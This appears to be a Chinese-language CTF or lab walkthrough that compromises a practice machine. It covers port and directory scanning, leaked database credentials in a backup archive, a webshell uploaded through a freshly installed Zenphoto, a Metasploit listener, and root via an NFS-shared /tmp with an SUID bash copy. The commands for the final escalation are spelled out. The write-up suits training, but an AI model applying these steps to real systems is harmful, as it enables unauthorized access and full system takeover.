一、信息收集
使用 arp-scan -l 获取靶机IP
获得IP后用nmap进行端口扫描
nmap -sV 10.10.10.147 -T4 -n
可以发现它打开了http服务,可以试试用dirb跑一下
dirb http://10.10.10.147
发现了一个可能是管理员后台的网站f和另一个用于存放备份文件的网站
二、渗透
直接去之前挖到的网站看看
10.10.10.147/admin/
啊,是白的呢,大概率是拿来骗人的,直接看下一个。
10.10.10.147/dackups
哦豁,有惊喜。
试了一下,那个ssh的没权限,但是这个压缩有啊,打开看看,里面可能会有数据库的连接文件。
还真有,打开看看
用户名:dbuser,密码:dbpassword;尝试在之前捞到的phpmyadmin里试试
额,之后在里面捞了一遍发现什么特别有用的信息都找不到(可能是我太菜了吧
然后在URL上随便试了一下那个zenphoto能不能进然后:
怪不得那个叫zenphoto的库是空的,原来是还没安装啊~ 帮他安装一下
安完就发现了文件上传,真不错,给它传个冰蝎大宝贝上去。
上传成功后,可以把msf开起来监听
这样就获取到它的shell了,剩下就是提权了
三、提权
之前nmap的时候我就发现它开了nfs,这边看一下,它共享了哪个文件夹
哦豁,是/tmp啊,不错不错,尝试把/bin/bash复制到tmp里
啊复制成功了,然后在攻击机上挂载它共享的文件夹
mkdir /mnt/test
mount 10.10.10.147:/tmp /mnt/test
挂成了,然后帮它改一下
chown root:root bash
chmod u+s bash
改完之后,在靶机上运行/tmp/bash就可以了(大家复制的时候尽量把bash改成别的名字,我跑的时候老是脑子一抽跑成那个/bin/bash的命令
./bash -p
提权成功